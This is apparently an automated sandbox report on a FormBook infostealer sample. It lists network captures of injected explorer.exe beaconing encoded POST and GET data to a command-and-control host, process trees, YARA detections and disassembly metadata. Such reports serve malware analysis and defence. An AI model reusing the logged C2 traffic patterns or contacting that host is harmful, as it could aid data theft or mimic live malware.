                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        7192.168.2.549728188.114.97.780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:37.319159985 CEST143OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.antalyabfe.com
                                        Connection: close
                                        Content-Length: 1482
                                        Cache-Control: no-cache
                                        Origin: http://www.antalyabfe.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.antalyabfe.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 56 78 65 79 75 6c 56 4b 50 56 4d 64 50 50 62 7e 6a 7a 5a 44 70 4b 77 52 6c 61 4b 76 43 57 37 69 6e 45 4c 50 5f 48 2d 6a 72 5a 56 38 7a 76 73 57 5f 4a 77 73 75 65 4a 7a 34 6f 4e 4f 49 28 4a 74 30 52 2d 4b 4a 45 7a 47 41 4d 54 57 64 57 48 53 73 54 79 34 70 6e 4d 63 44 53 35 5a 6f 49 69 65 55 7a 36 4e 6f 49 56 31 6e 4b 38 58 31 79 41 65 66 63 72 50 35 67 4c 7e 34 42 6f 41 4c 4a 6b 42 6b 4a 41 7a 4c 32 67 50 49 71 7a 76 54 4b 4d 73 72 48 33 41 69 69 79 37 43 6e 66 33 56 52 6d 38 57 7a 69 28 33 6d 6f 4a 37 41 4a 58 64 70 6d 4e 41 7e 7a 38 31 35 49 53 30 67 58 52 4d 54 55 59 33 4b 37 51 55 39 70 46 44 4d 6f 38 7a 66 52 30 7a 61 43 68 6d 4c 55 36 73 31 4b 6a 35 62 37 46 54 64 69 69 4a 47 4b 6d 59 75 68 6e 37 73 76 31 38 68 64 78 38 6d 77 7a 33 39 49 77 49 52 65 35 69 38 58 67 62 49 42 54 75 6e 2d 42 63 6a 34 5a 64 74 46 70 38 57 5a 33 62 72 61 63 72 28 4f 6d 69 47 4a 42 66 70 31 43 6e 79 6a 79 49 78 44 39 44 45 4d 28 2d 64 67 58 2d 4d 37 53 66 69 54 67 50 4e 6d 6b 50 43 56 4b 37 42 71 4a 5a 37 76 76 31 6d 42 64 75 51 35 59 59 74 39 6a 71 69 71 44 54 53 63 64 48 73 57 4f 58 65 78 42 34 37 4f 65 65 33 52 61 4b 76 59 55 51 62 5a 4c 4b 37 46 67 38 44 4d 39 7a 55 73 6d 32 4b 76 59 51 4c 4c 77 69 75 6c 62 37 68 56 41 4b 62 59 74 4a 55 34 68 69 48 7a 48 51 65 42 4e 4a 46 66 6a 48 74 4d 77 59 74 45 79 6c 6f 62 65 4a 71 49 6f 71 66 75 4f 44 43 4d 7a 38 53 50 74 34 36 31 47 79 6c 59 7a 79 66 67 56 56 67 74 4a 73 46 50 33 6c 67 37 46 54 42 53 71 72 63 37 4d 51 45 37 66 77 55 7a 64 31 44 72 6b 6f 6a 4a 54 46 65 33 4d 50 34 6b 7e 38 51 59 4d 38 32 39 73 76 71 59 4a 37 5a 74 4b 66 77 6b 6b 31 71 6b 42 48 4e 71 4c 39 68 42 50 6c 79 70 79 5a 6c 31 39 5f 59 62 6e 64 48 61 70 51 4f 59 33 38 72 77 31 75 28 70 79 49 66 66 31 64 62 6b 6a 4a 6f 48 69 79 63 32 73 35 49 71 33 56 61 37 4e 48 6a 75 75 31 59 78 61 73 49 36 4e 50 51 53 52 62 49 48 76 65 30 79 6d 74 73 6c 4b 62 28 52 6d 33 30 6d 37 45 4f 62 36 4e 33 43 51 51 44 44 64 79 35 63 41 35 78 55 70 31 6d 66 4b 6d 70 34 28 6c 7a 61 58 4d 77 58 77 7a 34 45 57 55 56 41 73 55 63 44 78 33 41 47 45 4e 39 44 42 5f 4c 30 32 4b 7a 74 36 48 44 62 4e 57 5a 62 4c 32 32 51 54 77 48 38 7e 39 36 70 78 62 72 61 46 38 7a 76 70 5a 30 41 37 47 65 61 45 76 61 4e 58 59 49 53 4c 77 58 43 56 45 4b 48 48 64 64 39 31 66 79 71 51 63 65 51 72 6d 78 35 51 42 77 75 6c 54 4d 70 44 6f 57 52 38 62 7a 5a 35 73 74 34 45 59 71 38 61 66 68 57 5a 54 55 73 44 68 63 64 33 30 61 76 35 66 58 70 69 67 76 58 6d 53 39 44 4d 4d 63 46 32 56 4d 2d 61 54 4d 63 36 67 7a 6d 6e 69 6d 49 51 34 66 4c 56 65 71 79 70 61 71 72 63 70 65 63 30 49 44 52 74 5a 54 71 73 59 46 44 35 54 7a 48 56 32 44 4e 69 69 42 6a 36 30 66 54 77 5a 50 74 56 71 72 5a 6a 30 56 54 54 53 43 70 4d 2d 49 47 76 6b 37 36 50 38 41 68 47 4f 6d 31 7e 4f 6f 70 65 39 7e 65 73 76 7e 67 71 32 58 69 76 67 66 32 79 56 71 6d 6f 49 56 79 7a 50 73 77 35 47 6f 31 6f 74 54 31 31 6e 6b 6d 69 7a 56 39 6e 62 6a 71 7a 52 77 4d 58 6b 39 38 4c 36 7e 36 41 5a 4b 51 56 64 43 49 47 32 6d 4f 6e 6c 57 74 64 2d 32 42 7a 76 62 72 45 67 4d 6f 56 37 6f 6b 42 6e 73 35 46 50 33 37 53 4b 6c 76 68 57 47 6c 64 54 73 56 67 48 68 58 72 63 6f 73 5a 6d 30 48 78 39 46 34 66 6e 52 2d 78 2d 59 37 64 64 47 70 4e 45 28 78 74 4c 67 4a 38 2d 4a 79 33 46 53 5f 70 7a 71 35 61 38 43 54 54 79 63 42 37 35 47 62 33 32 4f 73 75 62 70 32 28 78 71 7a 47 77 33 6e 64 7a 4b 62 64 58 48 31 79 43 57 30 79 58 5a 52 6e 51 44 53 6a 5a 78 6d 36 71 76 35 61 47 6d 44 31 78 4a 46 38 6a 4f 72 74 6e 48 64 54 50 54 58 75 72 45 64 41 4b 5a 59 6f 67 75 4a 37 70 54 6c 46 47 56 30 63 49 4a 6f 6a 4a 61 33 7e 4a 49 65 7a 4f 67 66 48 71 52 71 53 4c 76 66 6e 4d 56 39 6c 4d 47 4c 61 70 49 4f 35 4d 54 56 43 30 57 5a 4a 54 55 6a 38 4a 46 33 71 49 71 47 71 4f 69 46 31 34 62 44 64 72 33 4b 67 42 58 59 48 6d 7a 53 43 35 4f 7a 4c 4c 31 70 38 35 67 74 4e 34 65 61 45 32 4a 51 68 4e 7a 48 39 61 4d 62 72 4a 4e 51 6f 50 41 58 68 57 73 46 76 35 6e 52 70 54 77 35 32 39 37 48 53 48 79 73 47 44 62 53 31 6e 59 69 33 49 49 4c 67 6a 68 34 54 48 35 36 4c 5a 6c 77 71 4d 7a 51 6c 59 62 4a 4d 65 45 6e 69 72 46 56 6d 70
                                        Data Ascii: yDcF=8GpXORSvCn1_kVxeyulVKPVMdPPb~jzZDpKwRlaKvCW7inELP_H-jrZV8zvsW_JwsueJz4oNOI(Jt0R-KJEzGAMTWdWHSsTy4pnMcDS5ZoIieUz6NoIV1nK8X1yAefcrP5gL~4BoALJkBkJAzL2gPIqzvTKMsrH3Aiiy7Cnf3VRm8Wzi(3moJ7AJXdpmNA~z815IS0gXRMTUY3K7QU9pFDMo8zfR0zaChmLU6s1Kj5b7FTdiiJGKmYuhn7sv18hdx8mwz39IwIRe5i8XgbIBTun-Bcj4ZdtFp8WZ3bracr(OmiGJBfp1CnyjyIxD9DEM(-dgX-M7SfiTgPNmkPCVK7BqJZ7vv1mBduQ5YYt9jqiqDTScdHsWOXexB47Oee3RaKvYUQbZLK7Fg8DM9zUsm2KvYQLLwiulb7hVAKbYtJU4hiHzHQeBNJFfjHtMwYtEylobeJqIoqfuODCMz8SPt461GylYzyfgVVgtJsFP3lg7FTBSqrc7MQE7fwUzd1DrkojJTFe3MP4k~8QYM829svqYJ7ZtKfwkk1qkBHNqL9hBPlypyZl19_YbndHapQOY38rw1u(pyIff1dbkjJoHiyc2s5Iq3Va7NHjuu1YxasI6NPQSRbIHve0ymtslKb(Rm30m7EOb6N3CQQDDdy5cA5xUp1mfKmp4(lzaXMwXwz4EWUVAsUcDx3AGEN9DB_L02Kzt6HDbNWZbL22QTwH8~96pxbraF8zvpZ0A7GeaEvaNXYISLwXCVEKHHdd91fyqQceQrmx5QBwulTMpDoWR8bzZ5st4EYq8afhWZTUsDhcd30av5fXpigvXmS9DMMcF2VM-aTMc6gzmnimIQ4fLVeqypaqrcpec0IDRtZTqsYFD5TzHV2DNiiBj60fTwZPtVqrZj0VTTSCpM-IGvk76P8AhGOm1~Oope9~esv~gq2Xivgf2yVqmoIVyzPsw5Go1otT11nkmizV9nbjqzRwMXk98L6~6AZKQVdCIG2mOnlWtd-2BzvbrEgMoV7okBns5FP37SKlvhWGldTsVgHhXrcosZm0Hx9F4fnR-x-Y7ddGpNE(xtLgJ8-Jy3FS_pzq5a8CTTycB75Gb32Osubp2(xqzGw3ndzKbdXH1yCW0yXZRnQDSjZxm6qv5aGmD1xJF8jOrtnHdTPTXurEdAKZYoguJ7pTlFGV0cIJojJa3~JIezOgfHqRqSLvfnMV9lMGLapIO5MTVC0WZJTUj8JF3qIqGqOiF14bDdr3KgBXYHmzSC5OzLL1p85gtN4eaE2JQhNzH9aMbrJNQoPAXhWsFv5nRpTw5297HSHysGDbS1nYi3IILgjh4TH56LZlwqMzQlYbJMeEnirFVmpaJAq4erLl9eLD2Yy4_D4cQMeewFS2Wwjz2IXB8ZLm7aNe3OCfPXdU5XAyW0G1hoi(4IVH86oW33CoX3aT-v8~0rNr0Py5FOrfwbW0CgHsbyHRmIcSfnQ).
                                        May 23, 2023 09:39:37.345830917 CEST143INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 23 May 2023 07:39:37 GMT
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=3600
                                        Expires: Tue, 23 May 2023 08:39:37 GMT
                                        Location: https://www.antalyabfe.com/bpg5/
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BP4cM%2BkYfXWmOohtU76mvOnSMdidYekJvjDc1UD9bjajxtroY%2Fito5lGgmVZ7IP48naxvsKW3aylBrF4CY%2FpzZquq%2B1JnXx1Q1oW14Qs%2Fg3sUMsrH2myjZ2KYlUCXpCh2yl8ILU%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Vary: Accept-Encoding
                                        Server: cloudflare
                                        CF-RAY: 7cbba5663bbd6915-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        8192.168.2.549729188.114.97.780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:39.884820938 CEST144OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.antalyabfe.com
                                        Connection: close
                                        Content-Length: 186
                                        Cache-Control: no-cache
                                        Origin: http://www.antalyabfe.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.antalyabfe.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 55 78 65 79 5f 6c 56 4d 76 56 4d 65 50 50 62 72 54 7a 62 44 70 48 4e 52 6b 76 52 76 30 79 37 68 79 6f 4c 50 4d 76 2d 6b 72 5a 55 30 54 76 6f 59 66 4a 68 73 75 66 71 7a 36 38 4e 4f 49 37 4a 72 53 64 2d 66 59 45 77 4f 51 4d 56 64 39 57 45 53 74 75 4d 34 70 6a 6d 63 44 36 35 5a 75 49 69 66 55 44 36 47 72 77 56 67 48 4b 36 52 31 79 74 65 66 51 36 50 34 4d 39 7e 34 56 6f 41 36 56 6b 42 31 70 41 32 63 61 67 47 6f 71 79 37 6a 4c 2d 6f 5a 72 37 4b 43 79 43 30 67 61 71 33 31 59 48 71 6c 69 71 6c 77 29 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: yDcF=8GpXORSvCn1_kUxey_lVMvVMePPbrTzbDpHNRkvRv0y7hyoLPMv-krZU0TvoYfJhsufqz68NOI7JrSd-fYEwOQMVd9WEStuM4pjmcD65ZuIifUD6GrwVgHK6R1ytefQ6P4M9~4VoA6VkB1pA2cagGoqy7jL-oZr7KCyC0gaq31YHqliqlw).
                                        May 23, 2023 09:39:39.921047926 CEST145INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 23 May 2023 07:39:39 GMT
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=3600
                                        Expires: Tue, 23 May 2023 08:39:39 GMT
                                        Location: https://www.antalyabfe.com/bpg5/
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oonnM9T%2BftiMDzgHt2XyK2wXjbfYusuX6y4oBKCCiLem6OQhMFB83%2FUCS6CnG6Pekej5NLXAxvnXlvY8itub26fsVmap5czn0VyNPRSRWBNMUM%2FadN73qkqCjZGsjAHLaKda%2FBQ%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Vary: Accept-Encoding
                                        Server: cloudflare
                                        CF-RAY: 7cbba5764ad690d6-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.549730188.114.97.780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:42.415443897 CEST146OUTGET /bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&jdd=UX4BZm HTTP/1.1
                                        Host: www.antalyabfe.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 23, 2023 09:39:42.440845966 CEST147INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 23 May 2023 07:39:42 GMT
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=3600
                                        Expires: Tue, 23 May 2023 08:39:42 GMT
                                        Location: https://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&jdd=UX4BZm
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B2PYU0rGGsFCZM%2FLH2l6KVuNocwF1abv4UClGnKnk4kiogvJH4GNpBqrs3dCMx6NkT6PF2JxA7Bl%2F02%2FLV1YM%2FVg3b2w%2BaaUPgGaurJFC8bRMCdoW8qU4ywSXhIanndqFU%2Fj9DM%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 7cbba5861e371e57-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:09:38:19
                                        Start date:23/05/2023
                                        Path:C:\Users\user\Desktop\535276_86376.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\535276_86376.exe
                                        Imagebase:0xe0000
                                        File size:648192 bytes
                                        MD5 hash:FDE32A46DE11DF3E8E61FEA0E21EB144
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:09:38:29
                                        Start date:23/05/2023
                                        Path:C:\Users\user\Desktop\535276_86376.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\535276_86376.exe
                                        Imagebase:0x1c0000
                                        File size:648192 bytes
                                        MD5 hash:FDE32A46DE11DF3E8E61FEA0E21EB144
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:2
                                        Start time:09:38:30
                                        Start date:23/05/2023
                                        Path:C:\Users\user\Desktop\535276_86376.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\535276_86376.exe
                                        Imagebase:0x420000
                                        File size:648192 bytes
                                        MD5 hash:FDE32A46DE11DF3E8E61FEA0E21EB144
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:3
                                        Start time:09:38:30
                                        Start date:23/05/2023
                                        Path:C:\Users\user\Desktop\535276_86376.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\535276_86376.exe
                                        Imagebase:0x690000
                                        File size:648192 bytes
                                        MD5 hash:FDE32A46DE11DF3E8E61FEA0E21EB144
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        Reputation:low

                                        General

                                        Target ID:6
                                        Start time:09:38:35
                                        Start date:23/05/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff69bc80000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:7
                                        Start time:09:38:47
                                        Start date:23/05/2023
                                        Path:C:\Windows\SysWOW64\systray.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\systray.exe
                                        Imagebase:0xc10000
                                        File size:9728 bytes
                                        MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        Reputation:moderate

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:10.7%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:3.8%
                                          Total number of Nodes:105
                                          Total number of Limit Nodes:9
                                          execution_graph 24119 4a811f8 DuplicateHandle 24120 4a8128e 24119->24120 24121 4a85638 24122 4a856a0 CreateWindowExW 24121->24122 24124 4a8575c 24122->24124 24124->24124 24159 75d1d4 24160 75d1ec 24159->24160 24161 75d246 24160->24161 24167 4a864d9 24160->24167 24176 4a84524 24160->24176 24185 4a857f0 24160->24185 24189 4a86480 24160->24189 24199 4a857df 24160->24199 24170 4a864db 24167->24170 24168 4a86549 24219 4a8464c 24168->24219 24170->24168 24172 4a86539 24170->24172 24171 4a86547 24203 4a8673c 24172->24203 24209 4a86670 24172->24209 24214 4a86660 24172->24214 24177 4a8452f 24176->24177 24178 4a86549 24177->24178 24180 4a86539 24177->24180 24179 4a8464c CallWindowProcW 24178->24179 24181 4a86547 24179->24181 24182 4a8673c CallWindowProcW 24180->24182 24183 4a86660 CallWindowProcW 24180->24183 24184 4a86670 CallWindowProcW 24180->24184 24182->24181 24183->24181 24184->24181 24186 4a85816 24185->24186 24187 4a84524 CallWindowProcW 24186->24187 24188 4a85837 24187->24188 24188->24161 24190 4a8648e 24189->24190 24193 4a864db 24189->24193 24190->24161 24191 4a86549 24192 4a8464c CallWindowProcW 24191->24192 24195 4a86547 24192->24195 24193->24191 24194 4a86539 24193->24194 24196 4a8673c CallWindowProcW 24194->24196 24197 4a86660 CallWindowProcW 24194->24197 24198 4a86670 CallWindowProcW 24194->24198 24196->24195 24197->24195 24198->24195 24200 4a857f1 24199->24200 24201 4a84524 CallWindowProcW 24200->24201 24202 4a85837 24201->24202 24202->24161 24204 4a866fa 24203->24204 24205 4a8674a 24203->24205 24223 4a86718 24204->24223 24226 4a86728 24204->24226 24206 4a86710 24206->24171 24211 4a86684 24209->24211 24210 4a86710 24210->24171 24212 4a86728 CallWindowProcW 24211->24212 24213 4a86718 CallWindowProcW 24211->24213 24212->24210 24213->24210 24216 4a86684 24214->24216 24215 4a86710 24215->24171 24217 4a86728 CallWindowProcW 24216->24217 24218 4a86718 CallWindowProcW 24216->24218 24217->24215 24218->24215 24220 4a84657 24219->24220 24221 4a87c39 24220->24221 24222 4a87c8a CallWindowProcW 24220->24222 24221->24171 24222->24221 24224 4a86739 24223->24224 24229 4a87b36 24223->24229 24224->24206 24227 4a86739 24226->24227 24228 4a87b36 CallWindowProcW 24226->24228 24227->24206 24228->24227 24232 4a87a4f 24229->24232 24230 4a8464c CallWindowProcW 24231 4a87bda 24230->24231 24231->24224 24232->24224 24232->24229 24232->24230 24233 4a879be 24232->24233 24233->24224 24125 24740d0 24126 24740e2 24125->24126 24127 24740ee 24126->24127 24129 24741e0 24126->24129 24130 2474205 24129->24130 24134 24742d1 24130->24134 24138 24742e0 24130->24138 24136 24742e0 24134->24136 24135 24743e4 24135->24135 24136->24135 24142 2473e08 24136->24142 24139 2474307 24138->24139 24140 24743e4 24139->24140 24141 2473e08 CreateActCtxA 24139->24141 24140->24140 24141->24140 24143 2475370 CreateActCtxA 24142->24143 24145 2475433 24143->24145 24234 247ee30 24235 247ee72 24234->24235 24236 247ee78 GetModuleHandleW 24234->24236 24235->24236 24237 247eea5 24236->24237 24146 4a85930 24147 4a858d0 SetWindowLongW 24146->24147 24150 4a8593e 24146->24150 24149 4a858ec 24147->24149 24238 4a80fd0 GetCurrentProcess 24239 4a8104a GetCurrentThread 24238->24239 24240 4a81043 24238->24240 24241 4a81080 24239->24241 24242 4a81087 GetCurrentProcess 24239->24242 24240->24239 24241->24242 24245 4a810bd 24242->24245 24243 4a810e5 GetCurrentThreadId 24244 4a81116 24243->24244 24245->24243 24151 247eed8 24152 247eeec 24151->24152 24153 247ef11 24152->24153 24155 247e6d8 24152->24155 24156 247f0b8 LoadLibraryExW 24155->24156 24158 247f131 24156->24158 24158->24153

                                          Executed Functions

                                          Function 04A85930 Relevance: 1.8, APIs: 1, Instructions: 259COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 38 4a85930-4a8593c 39 4a8593e-4a8599e call 4a81cbc 38->39 40 4a858d0-4a858ea SetWindowLongW 38->40 50 4a859ef-4a85a26 39->50 51 4a859a0-4a859e9 39->51 43 4a858ec-4a858f2 40->43 44 4a858f3-4a85907 40->44 43->44 58 4a85a2c-4a85a55 50->58 59 4a85ba3-4a85bca 50->59 51->50 61 4a85c1b-4a85c3c 51->61 70 4a85a5e-4a85ac2 58->70 71 4a85bcf-4a85bf1 59->71 73 4a85bf4-4a85bf7 61->73 86 4a85ac8-4a85afd 70->86 87 4a85b79-4a85b80 70->87 71->73 76 4a85bfb-4a85c44 73->76 82 4a85c4e 76->82 83 4a85c46 76->83 83->82 86->87 94 4a85aff-4a85b31 86->94 87->76 88 4a85b82-4a85ba1 87->88 88->71 94->87 99 4a85b33-4a85b74 call 4a85850 94->99 99->87
                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 04A858DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: 29f1b6090755dbfc28102126e2174060348de0ffbe2c60bad4e03ed7829527e6
                                          • Instruction ID: e6de0ae313601a191ec8a558ab7b08e6359735f2129e1a7419ecec2341645fe5
                                          • Opcode Fuzzy Hash: 29f1b6090755dbfc28102126e2174060348de0ffbe2c60bad4e03ed7829527e6
                                          • Instruction Fuzzy Hash: 75A19D35E00309DFCB04EFA4D89499DBBBAFF99310F148619E416AB260EB74B885DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02473880 Relevance: .6, Instructions: 639COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.414095794.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2470000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ccc4189575328db27f537db297d6949c0e032f76c4253ba4ff006735322fed41
                                          • Instruction ID: 8ccece3f692050fdc0babec2e18b56d1239fc5e7a8dc59531a4657ed52f61bbb
                                          • Opcode Fuzzy Hash: ccc4189575328db27f537db297d6949c0e032f76c4253ba4ff006735322fed41
                                          • Instruction Fuzzy Hash: 8B629E74D412289FDB25DF64D958ADDBBB2BF89300F1095EAD90AA7350DB315E81CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02477302 Relevance: .4, Instructions: 415COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.414095794.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2470000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e9b79caf01f5da76dc8371ec7bd26fbdab028ee63c4564efc024a7e6e4c22e3
                                          • Instruction ID: 163e30e3bcfe61ecc9c2635748ad3b73b743be4abdf14de609143f28a42e2fa3
                                          • Opcode Fuzzy Hash: 2e9b79caf01f5da76dc8371ec7bd26fbdab028ee63c4564efc024a7e6e4c22e3
                                          • Instruction Fuzzy Hash: BD22B078A412289FDB25DF60D954ADDBBB2FF89300F0085EAD90AA7361DB315E91DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

